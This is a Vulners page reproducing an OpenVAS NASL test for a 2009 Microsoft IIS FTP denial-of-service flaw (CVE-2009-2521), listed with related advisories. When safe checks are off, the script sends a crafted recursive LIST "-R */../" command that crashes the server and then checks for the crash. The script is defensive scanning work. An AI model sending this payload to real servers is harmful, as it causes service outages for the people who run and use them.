| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053] | 3 Jul 201100:00 | – | zdt | |
| CVE-2009-2521 | 4 Sep 200900:00 | – | circl | |
| Microsoft IIS FTP Server Recursive Listing Denial of Service (CVE-2009-2521; CVE-2009-3023) | 8 Sep 200900:00 | – | checkpoint_advisories | |
| CVE-2009-2521 | 4 Sep 200910:00 | – | cve | |
| CVE-2009-2521 | 4 Sep 200910:00 | – | cvelist | |
| Microsoft IIS 7.0 FTP Server - Stack Exhaustion Denial of Service (MS09-053) (Metasploit) | 3 Jul 201100:00 | – | exploitdb | |
| Microsoft IIS 7.0 FTP Server - Stack Exhaustion Denial of Service (MS09-053) (Metasploit) | 3 Jul 201100:00 | – | exploitpack | |
| Microsoft IIS FTP Server LIST Stack Exhaustion | 26 Nov 201119:30 | – | metasploit | |
| CVE-2009-2521 | 4 Sep 200910:30 | – | nvd | |
| Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254) | 15 Oct 200900:00 | – | openvas |
###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_ms_iis_ftpd_ls_dos_vuln.nasl 5122 2017-01-27 12:16:00Z teissa $
#
# Microsoft IIS FTP Server 'ls' Command DOS Vulnerability
#
# Authors:
# Nikita MR <[email protected]>
#
# Copyright:
# Copyright (c) 2009 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
tag_impact = "Successful exploitation will allows remote authenticated users to crash the
application leading to denial of service condition.
Impact Level: Application";
tag_affected = "Microsoft Internet Information Services version 5.0 and 6.0";
tag_insight = "A stack consumption error occurs in the FTP server while processing crafted
LIST command containing a wildcard that references a subdirectory followed by
a .. (dot dot).";
tag_solution = "Upgrade to IIS version 7.5
http://www.iis.net/";
tag_summary = "The host is running Microsoft IIS with FTP server and
is prone to Denial of Service vulnerability.";
if(description)
{
script_id(900944);
script_version("$Revision: 5122 $");
script_tag(name:"last_modification", value:"$Date: 2017-01-27 13:16:00 +0100 (Fri, 27 Jan 2017) $");
script_tag(name:"creation_date", value:"2009-09-18 08:01:03 +0200 (Fri, 18 Sep 2009)");
script_tag(name:"cvss_base", value:"2.6");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:H/Au:N/C:N/I:N/A:P");
script_cve_id("CVE-2009-2521");
script_bugtraq_id(36273);
script_name("Microsoft IIS FTP Server 'ls' Command DOS Vulnerability");
script_xref(name : "URL" , value : "http://www.microsoft.com/technet/security/advisory/975191.mspx");
script_xref(name : "URL" , value : "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html");
script_xref(name : "URL" , value : "http://blogs.technet.com/msrc/archive/2009/09/01/microsoft-security-advisory-975191-released.aspx");
script_xref(name : "URL" , value : "http://blogs.technet.com/msrc/archive/2009/09/03/microsoft-security-advisory-975191-revised.aspx");
script_category(ACT_DENIAL);
script_copyright("Copyright (C) 2009 SecPod");
script_family("Denial of Service");
script_dependencies("secpod_ftp_anonymous.nasl");
script_require_ports("Services/ftp", 21);
script_tag(name : "impact" , value : tag_impact);
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name:"qod_type", value:"registry");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("ftp_func.inc");
include("version_func.inc");
ftpPort = get_kb_item("Services/ftp");
if(!ftpPort){
ftpPort = 21;
}
if(!get_port_state(ftpPort)) {
exit(0);
}
banner = get_ftp_banner(port:ftpPort);
if("Microsoft FTP Service" >!< banner) {
exit(0);
}
if(!safe_checks())
{
soc = open_sock_tcp(ftpPort);
if(!soc) {
exit(0);
}
login = get_kb_item("ftp/login");
if(!login){
login = "anonymous";
}
pass = get_kb_item("ftp/password");
if(!pass){
pass = "anonymous";
}
if(ftp_authenticate(socket:soc, user: login, pass: pass))
{
cmd = 'LIST "-R */../"\r\n'; # The IIS server crashes and restarted.
send(socket:soc, data:cmd);
sleep(10);
buff = recv(socket:soc, length:1024);
ecmd = 'LIST\r\n';
send(socket:soc, data:ecmd);
eresp = recv(socket:soc, length:1024);
if("Can't open data connection" >< eresp){
security_message(ftpPort);
}
}
close(soc);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation